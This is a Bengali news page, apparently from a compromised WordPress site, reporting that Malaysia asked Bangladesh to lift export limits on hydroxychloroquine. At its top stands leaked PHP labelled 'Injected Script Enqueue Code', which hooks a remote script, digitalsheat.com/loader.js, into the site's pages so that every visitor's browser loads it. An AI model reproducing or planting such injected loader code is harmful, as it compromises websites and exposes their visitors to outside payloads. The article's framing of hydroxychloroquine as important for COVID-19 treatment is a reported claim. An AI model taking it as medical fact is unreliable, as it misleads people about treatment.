// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site বাংলাদেশের কাছে হাইড্রোক্লোরোকুইন চায় মালয়েশিয়া - Janabarta.com

বাংলাদেশের কাছে হাইড্রোক্লোরোকুইন চায় মালয়েশিয়া

জনবার্তা অনলাইনঃ বাংলাদেশের কাছে হাইড্রোক্লোরোকুইন চায় মালয়েশিয়া। হাইড্রোক্লোরোকুইন ট্যাবলেট করোনা রোগীর চিকিৎসায় গুরুত্বপূর্ণ উল্লেখ করে এটি রপ্তানীতে বিধিনিষেধ প্রত্যাহারে ঢাকার প্রতি অনুরোধ জানিয়েছে কুয়ালালামপুর। পররাষ্ট্র মন্ত্রণালয় জানিয়েছে, সম্প্রতি মন্ত্রী ড. এ. কে. আব্দুল মোমেনকে চিঠি লিখেন মালয়েশিয়ার পররাষ্ট্রমন্ত্রী হিসামুদ্দিন তুন হোসেইন। সেই চিঠিতে তিনি ক্লোরোকুইন চাহিদার বিষয়টি উল্লেখ করেন। এছাড়া মালয়েশিয়ান পররাষ্ট্রমন্ত্রী বর্তমান করোনা পরিস্থিতি মোকাবিলায় বাংলাদেশ ও মালয়েশিয়ার একত্রে কাজ করার ওপর গুরুত্বারোপ করেন।তিনি মন্ত্রী মোমেনকে আশ্বস্ত করে বলেন, করোনায় উদ্ভূত পরিস্থিতিতে মালয়েশিয়ার সরকার সেদেশে থাকা বিশাল সংখ্যক প্রবাসী বাংলাদেশিকে সার্বিক সহযোগিতা করছে। এ বিষয়ে সরকার কুয়ালালামপুরস্থ বাংলাদেশ দূতাবাসের সঙ্গে ঘনিষ্ঠভাবে কাজ করছে। তিনি বাংলাদেশে আটকে পড়া মালয়েশিয়ার নাগরিকদের ফেরানোর ক্ষেত্রে সহযোগিতার জন্য ড. মোমেন তথা বাংলাদেশকে ধন্যবাদ জানান।